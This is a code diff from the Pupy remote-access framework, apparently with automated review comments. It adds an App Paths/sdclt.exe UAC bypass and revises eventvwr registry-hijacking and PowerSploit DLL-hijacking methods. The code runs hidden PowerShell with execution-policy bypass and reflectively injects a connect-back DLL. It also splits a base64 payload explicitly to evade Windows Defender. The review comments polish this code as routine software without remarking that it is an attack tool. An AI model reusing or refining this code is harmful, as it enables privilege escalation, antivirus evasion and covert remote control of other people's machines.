Merge branch 'master' of https://github.com/quentinhardy/pupy into unstable
16245b91c2
@ -17,7 +17,7 @@ class BypassUAC(PupyModule):
|
|||
|
||||
def init_argparse(self):
|
||||
self.arg_parser = PupyArgumentParser(prog="bypassuac", description=self.__doc__)
|
||||
self.arg_parser.add_argument('-m', dest='method', choices=["eventvwr", "dll_hijacking"], default=None, help="Default: the technic will be choosen for you. 'dll_hijacking' for wind7-8.1 and 'eventvwr' for wind7-10.")
|
||||
self.arg_parser.add_argument('-m', dest='method', choices=["appPaths","eventvwr", "dll_hijacking"], default=None, help="By default, the method will be choosen for you: 'eventvwr' for wind7-8.1 and 'appPaths' for wind10. dll_hijacking method can be used for Windows 7/2008 and Windows 8/2012")
|
||||
|
||||
def run(self, args):
|
||||
# check if a UAC Bypass can be done
|
||||
|
@ -25,25 +25,32 @@ class BypassUAC(PupyModule):
|
|||
self.error('Your are not on the local administrator group.')
|
||||
return
|
||||
|
||||
dll_hijacking = False
|
||||
registry_hijacking = False
|
||||
appPathsMethod = False
|
||||
eventvwrMethod = False
|
||||
dllhijackingMethod = False
|
||||
|
||||
bypassUasModule = bypassuac(self, rootPupyPath=ROOT)
|
||||
# choose methods depending on the OS Version
|
||||
if not args.method:
|
||||
if self.client.desc['release'] == '10':
|
||||
registry_hijacking = True
|
||||
appPathsMethod = True
|
||||
else:
|
||||
dll_hijacking = True
|
||||
elif args.method == "eventvwr":
|
||||
registry_hijacking = True
|
||||
else:
|
||||
dll_hijacking = True
|
||||
dllhijackingMethod = True
|
||||
elif args.method == "appPaths":
|
||||
appPathsMethod = True
|
||||
elif args.method == "eventvwr":
|
||||
eventvwrMethod = True
|
||||
elif args.method == "dll_hijacking":
|
||||
dllhijackingMethod = True
|
||||
|
||||
if registry_hijacking:
|
||||
if appPathsMethod:
|
||||
self.success("Trying to bypass UAC using the 'app paths'+'sdclt.exe' method, wind10 targets ONLY...")
|
||||
bypassUasModule.bypassuac_through_appPaths()
|
||||
if eventvwrMethod:
|
||||
self.success("Trying to bypass UAC using the Eventvwr method, wind7-10 targets...")
|
||||
bypassUasModule.bypassuac_through_EventVwrBypass()
|
||||
elif dll_hijacking:
|
||||
bypassUasModule.bypassuac_through_eventVwrBypass()
|
||||
if dllhijackingMethod:
|
||||
# Invoke-BypassUAC.ps1 uses different technics to bypass depending on the Windows Version (Sysprep for Windows 7/2008 and NTWDBLIB.dll for Windows 8/2012)
|
||||
self.success("Trying to bypass UAC using DLL Hijacking, wind7-8.1 targets...")
|
||||
bypassUasModule.bypassuac_through_PowerSploitBypassUAC()
|
||||
bypassUasModule.bypassuac_through_powerSploitBypassUAC()
|
||||
|
||||
|
|
|
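Review bot: The help text on the new `-m` option (the line whose choices are `["appPaths","eventvwr", "dll_hijacking"]`) states that the default for Windows 7–8.1 is 'eventvwr', but the default-selection branch in the `run` hunk below appears to set `dllhijackingMethod = True` whenever `release` is not '10' — the old and new sides are interleaved in this rendering, so confirm which flag the non-10 `else:` branch sets on the new side, and then make either the string or the branch agree with the other. The same string misspells 'chosen' as 'choosen'; if the code's default stands, the wording would be `help="By default, the method is chosen for you: 'dll_hijacking' for Windows 7-8.1 and 'appPaths' for Windows 10. dll_hijacking can be used on Windows 7/2008 and Windows 8/2012."`. Both `init_argparse` and `run` are cut at the hunk edges, so the remainder of the dispatch is not visible here.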
@ -23,10 +23,10 @@ class bypassuac():
|
|||
#Remote paths
|
||||
remoteTempFolder, systemRoot = self.module.client.conn.modules["pupwinutils.bypassuac_remote"].get_env_variables()
|
||||
|
||||
self.invokeReflectivePEInjectionRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
|
||||
self.mainPowershellScriptRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
|
||||
self.pupyDLLRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
|
||||
self.invokeBypassUACRemotePath = "{temp}{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
|
||||
self.invokeReflectivePEInjectionRemotePath = "{temp}\\{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
|
||||
self.mainPowershellScriptRemotePath = "{temp}\\{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
|
||||
self.pupyDLLRemotePath = "{temp}\\{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.txt')
|
||||
self.invokeBypassUACRemotePath = "{temp}\\{random}{ext}".format(temp=remoteTempFolder, random=next(_get_candidate_names()), ext='.ps1')
|
||||
|
||||
#Adding obfuscation on ps1 main function
|
||||
self.bypassUAC_random_name = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(7))
|
||||
|
@ -37,15 +37,36 @@ class bypassuac():
|
|||
self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
|
||||
self.invokeReflectivePEInjectionLocalPath = os.path.join(rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
|
||||
self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
|
||||
|
||||
|
||||
def bypassuac_through_EventVwrBypass(self):
|
||||
|
||||
def bypassuac_through_appPaths(self):
|
||||
'''
|
||||
Performs an UAC bypass attack by using app Paths + sdclt.exe (Wind10 Only): Thanks to enigma0x3 (https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/).
|
||||
'''
|
||||
self.module.info('Running app Paths method for bypassing UAC...')
|
||||
if '64' in self.module.client.desc['os_arch']:
|
||||
force_x86_dll = False
|
||||
else:
|
||||
force_x86_dll = True
|
||||
self.module.info('Uploading temporary files')
|
||||
self.uploadPupyDLL(force_x86_dll=force_x86_dll)
|
||||
self.uploadPowershellScripts()
|
||||
#files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath]
|
||||
files_to_delete=[]
|
||||
self.module.info('Altering the registry')
|
||||
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking_appPath(self.mainPowershellScriptRemotePath, files_to_delete)
|
||||
|
||||
self.module.success("Waiting for a connection from the DLL (take few seconds, 1 min max)...")
|
||||
self.module.success("If nothing happened, try to migrate to another process and try again.")
|
||||
|
||||
|
||||
def bypassuac_through_eventVwrBypass(self):
|
||||
# '''
|
||||
# Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
|
||||
# '''
|
||||
|
||||
# On a Windows 10 "C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe" does not exist, we cannot force to use a x64 bit powershell interpreter
|
||||
# The pupy dll upload will be a 32 bit
|
||||
self.module.info('Running eventVwr method for bypassing UAC...')
|
||||
if '64' in self.module.client.desc['proc_arch']:
|
||||
upload_x86_dll = False
|
||||
else:
|
||||
|
@ -55,16 +76,17 @@ class bypassuac():
|
|||
self.uploadPowershellScripts()
|
||||
files_to_delete=[self.invokeReflectivePEInjectionRemotePath, self.mainPowershellScriptRemotePath, self.pupyDLLRemotePath]
|
||||
self.module.info('Altering the registry')
|
||||
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking(self.mainPowershellScriptRemotePath, files_to_delete)
|
||||
|
||||
self.module.client.conn.modules["pupwinutils.bypassuac_remote"].registry_hijacking_eventvwr(self.mainPowershellScriptRemotePath, files_to_delete)
|
||||
|
||||
self.module.success("Waiting for a connection from the DLL (take few seconds)...")
|
||||
self.module.success("If nothing happened, try to migrate to another process and try again.")
|
||||
|
||||
def bypassuac_through_PowerSploitBypassUAC(self):
|
||||
|
||||
def bypassuac_through_powerSploitBypassUAC(self):
|
||||
'''
|
||||
Performs a bypass UAC attack by utilizing the powersloit UACBypass script (wind7 to 8.1)
|
||||
Performs an UAC bypass attack by using the powersloit UACBypass script (wind7 to 8.1)
|
||||
'''
|
||||
#Constants
|
||||
self.module.info('Running powersloit UACBypass method for bypassing UAC...')
|
||||
bypassUACcmd = "{InvokeBypassUAC} -Command 'powershell.exe -ExecutionPolicy Bypass -file {mainPowershell} -Verbose'".format(InvokeBypassUAC=self.bypassUAC_random_name, mainPowershell=self.mainPowershellScriptRemotePath)
|
||||
self.module.info('Uploading temporary files')
|
||||
self.uploadPowershellScripts()
|
||||
|
@ -99,19 +121,18 @@ class bypassuac():
|
|||
cat {pupy_dll} | Out-String | iex
|
||||
{InvokeReflectivePEInjection} -PEBytes $PEBytes -ForceASLR
|
||||
""".format(invoke_reflective_pe_injection=self.invokeReflectivePEInjectionRemotePath, pupy_dll=self.pupyDLLRemotePath, InvokeReflectivePEInjection=self.reflectivePE_random_name)
|
||||
|
||||
logging.debug("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath))
|
||||
|
||||
logging.info("Creating the Powershell script in %s locally"%(self.mainPowerShellScriptPrivilegedLocalPath))
|
||||
with open(self.mainPowerShellScriptPrivilegedLocalPath, 'w+') as w:
|
||||
w.write(mainPowerShellScriptPrivileged)
|
||||
|
||||
logging.debug("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath))
|
||||
|
||||
logging.info("Uploading powershell code for DLL injection in {0}".format(self.invokeReflectivePEInjectionRemotePath))
|
||||
content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I)
|
||||
tmp_file = os.path.join(gettempdir(),'reflective_pe.txt')
|
||||
with open(tmp_file, 'w+') as w:
|
||||
w.write(content)
|
||||
upload(self.module.client.conn, tmp_file, self.invokeReflectivePEInjectionRemotePath)
|
||||
|
||||
logging.debug("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath))
|
||||
logging.info("Uploading main powershell script executed by BypassUAC in {0}".format(self.mainPowershellScriptRemotePath))
|
||||
upload(self.module.client.conn, self.mainPowerShellScriptPrivilegedLocalPath, self.mainPowershellScriptRemotePath)
|
||||
|
||||
def uploadPupyDLL(self, force_x86_dll=False):
|
||||
|
@ -120,18 +141,22 @@ class bypassuac():
|
|||
'''
|
||||
res=self.module.client.conn.modules['pupy'].get_connect_back_host()
|
||||
host, port = res.rsplit(':',1)
|
||||
logging.debug("Address configured is %s:%s for pupy dll..."%(host,port))
|
||||
logging.debug("Looking for process architecture...")
|
||||
|
||||
logging.info("Address configured is %s:%s for pupy dll..."%(host,port))
|
||||
logging.info("Looking for process architecture...")
|
||||
logging.info("force x86 is %s"%force_x86_dll)
|
||||
conf = self.module.client.get_conf()
|
||||
if "64" in self.module.client.desc["os_arch"] and not force_x86_dll:
|
||||
dllbuff, tpl, _ = pupygen.generate_binary_from_template(conf, 'windows', arch='x64', shared=True)
|
||||
else:
|
||||
dllbuff, tpl, _ = pupygen.generate_binary_from_template(conf, 'windows', arch='x86', shared=True)
|
||||
|
||||
logging.debug("Creating the pupy dll (%s) in %s locally"%(tpl, self.pupyDLLLocalPath))
|
||||
|
||||
logging.info("Creating the pupy dll (%s) in %s locally"%(tpl, self.pupyDLLLocalPath))
|
||||
with open(self.pupyDLLLocalPath, 'w+') as w:
|
||||
w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
|
||||
|
||||
logging.debug("Uploading pupy dll in {0}".format(self.pupyDLLRemotePath))
|
||||
#the following powershell line in a txt file is detected by Windows defender
|
||||
#w.write('$PEBytes = [System.Convert]::FromBase64String("%s")'%(base64.b64encode(dllbuff)))
|
||||
#To bypass antivirus detection:
|
||||
dllbuffEncoded = base64.b64encode(dllbuff)
|
||||
w.write('$p1="{0}";$p2="{1}";$PEBytes=[System.Convert]::FromBase64String($p1+$p2)'.format(dllbuffEncoded[0:2], dllbuffEncoded[2:]))
|
||||
|
||||
logging.info("Uploading pupy dll {0} to {1}".format(self.pupyDLLLocalPath, self.pupyDLLRemotePath))
|
||||
upload(self.module.client.conn, self.pupyDLLLocalPath, self.pupyDLLRemotePath)
|
||||
|
|
|
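Review bot: In the hunk headed `@ -99,19 +121,18 @`, the context line `content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, open(self.invokeReflectivePEInjectionLocalPath).read(), flags=re.I)` opens the local script file and never closes it, while every write in the same hunk already uses `with`; read it the same way: `with open(self.invokeReflectivePEInjectionLocalPath) as r:` followed by `content = re.sub("Invoke-ReflectivePEInjection", self.reflectivePE_random_name, r.read(), flags=re.I)`. The enclosing method (presumably `uploadPowershellScripts`, judging by the callers in the earlier hunks) starts before this hunk, so its signature is not visible here.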
@ -20,7 +20,7 @@ def execute_powershell_script(module, content, function, x64IfPossible=False, sc
|
|||
elif "32" in module.client.desc['proc_arch']:
|
||||
arch = 'x86'
|
||||
|
||||
fullargs=[path, "-C", "-"]
|
||||
fullargs=[path, "-W", "hidden", "-C", "-"]
|
||||
|
||||
# create and store the powershell object if it not exists
|
||||
if not module.client.powershell[arch]['object']:
|
||||
|
|
|
@ -2,6 +2,7 @@ import os
|
|||
import time
|
||||
import subprocess
|
||||
from _winreg import *
|
||||
import ctypes
|
||||
|
||||
def deleteTHisRemoteFile(tmp_files):
|
||||
for file in tmp_files:
|
||||
|
@ -15,21 +16,21 @@ def get_env_variables():
|
|||
tmp = os.path.expandvars("%TEMP%")
|
||||
except:
|
||||
tmp = os.path.expandvars("%APPDATA%")
|
||||
|
||||
|
||||
sysroot = os.path.expandvars("%SYSTEMROOT%")
|
||||
|
||||
|
||||
return tmp, sysroot
|
||||
|
||||
|
||||
def registry_hijacking(mainPowershellScriptRemotePath, files_to_delete):
|
||||
def registry_hijacking_eventvwr(mainPowershellScriptRemotePath, files_to_delete):
|
||||
# '''
|
||||
# Based on Invoke-EventVwrBypass, thanks to enigma0x3 (https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/)
|
||||
# '''
|
||||
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
|
||||
powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % os.path.expandvars("%SYSTEMROOT%")
|
||||
mscCmdPath = "Software\Classes\mscfile\shell\open\command"
|
||||
cmd = "{1} -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath)
|
||||
|
||||
mscCmdPath = "Software\Classes\mscfile\shell\open\command"
|
||||
cmd = "{1} -w hidden -noni -nop -ExecutionPolicy Bypass -File {0}".format(mainPowershellScriptRemotePath, powershellPath)
|
||||
|
||||
try:
|
||||
# The registry key already exist in HKCU, altering...
|
||||
key = OpenKey(HKCU, mscCmdPath, KEY_SET_VALUE)
|
||||
|
@ -40,15 +41,58 @@ def registry_hijacking(mainPowershellScriptRemotePath, files_to_delete):
|
|||
registry_key = OpenKey(HKCU, mscCmdPath, 0, KEY_WRITE)
|
||||
SetValueEx(registry_key, '', 0, REG_SZ, cmd)
|
||||
CloseKey(registry_key)
|
||||
|
||||
|
||||
# Executing eventvwr.exe
|
||||
eventvwrPath = os.path.join(os.environ['WINDIR'],'System32','eventvwr.exe')
|
||||
output = subprocess.check_output(eventvwrPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
||||
|
||||
# Sleeping 5 secds...
|
||||
time.sleep(5)
|
||||
|
||||
|
||||
#Clean everything
|
||||
DeleteKey(HKCU, mscCmdPath)
|
||||
deleteTHisRemoteFile(files_to_delete)
|
||||
|
||||
|
||||
def registry_hijacking_appPath(mainPowershellScriptRemotePath, files_to_delete):
|
||||
'''
|
||||
'''
|
||||
tmp, sysRoot = get_env_variables()
|
||||
HKCU = ConnectRegistry(None, HKEY_CURRENT_USER)
|
||||
appPathsPath = "Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe"
|
||||
powershellPath = '%s\\system32\\WindowsPowerShell\\v1.0\\powershell.exe' % sysRoot
|
||||
cmd = "{0} -w hidden -noni -nop -ExecutionPolicy Bypass -File {1}".format(powershellPath, mainPowershellScriptRemotePath)
|
||||
cmdPath = "{0}\\temp.bat".format(tmp)
|
||||
|
||||
try:
|
||||
# The registry key already exist in HKCU, altering...
|
||||
key = OpenKey(HKCU, appPathsPath, KEY_SET_VALUE)
|
||||
except:
|
||||
# Adding the registry key in HKCU
|
||||
key = CreateKey(HKCU, appPathsPath)
|
||||
|
||||
registry_key = OpenKey(HKCU, appPathsPath, 0, KEY_WRITE)
|
||||
SetValueEx(registry_key, '', 0, REG_SZ, cmdPath)
|
||||
CloseKey(registry_key)
|
||||
|
||||
#Creates cmd file
|
||||
f=open(cmdPath, "w")
|
||||
f.write(cmd)
|
||||
f.close()
|
||||
|
||||
# Creation sdclt.exe path
|
||||
triggerPath = os.path.join(os.environ['WINDIR'],'System32','sdclt.exe')
|
||||
#Disables file system redirection for the calling thread (File system redirection is enabled by default)
|
||||
wow64 = ctypes.c_long(0)
|
||||
ctypes.windll.kernel32.Wow64DisableWow64FsRedirection(ctypes.byref(wow64))
|
||||
# Executing sdclt.exe
|
||||
output = subprocess.check_output(triggerPath, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell = True)
|
||||
#Enable file system redirection for the calling thread
|
||||
ctypes.windll.kernel32.Wow64EnableWow64FsRedirection(wow64)
|
||||
|
||||
# Sleeping 5 secds...
|
||||
time.sleep(5)
|
||||
|
||||
#Clean everything
|
||||
DeleteKey(HKCU, appPathsPath)
|
||||
deleteTHisRemoteFile(files_to_delete)
|
||||
deleteTHisRemoteFile([cmdPath])
|
||||
|
|
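Review bot: The docstring on the new `registry_hijacking_appPath` is empty (the `'''` / `'''` pair directly under the `def`), so nothing tells a reader what the function changes on the host; it should describe the artefacts the body visibly creates — the default value written under `Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe` in HKCU, the `temp.bat` dropped in the folder returned by `get_env_variables()`, the `sdclt.exe` launch — and state that the key and the .bat are removed only when `check_output` returns normally, since the cleanup lines sit after it with no `try`/`finally`. Two style points in the same hunk: the `f=open(cmdPath, "w")` / `f.write(cmd)` / `f.close()` triple should be a `with open(cmdPath, "w") as f:` block, and the bare `except:` around `OpenKey(HKCU, appPathsPath, KEY_SET_VALUE)` should name the exception it expects for a missing key rather than catching everything (the `get_env_variables` hunk above uses the same bare `except:` pattern).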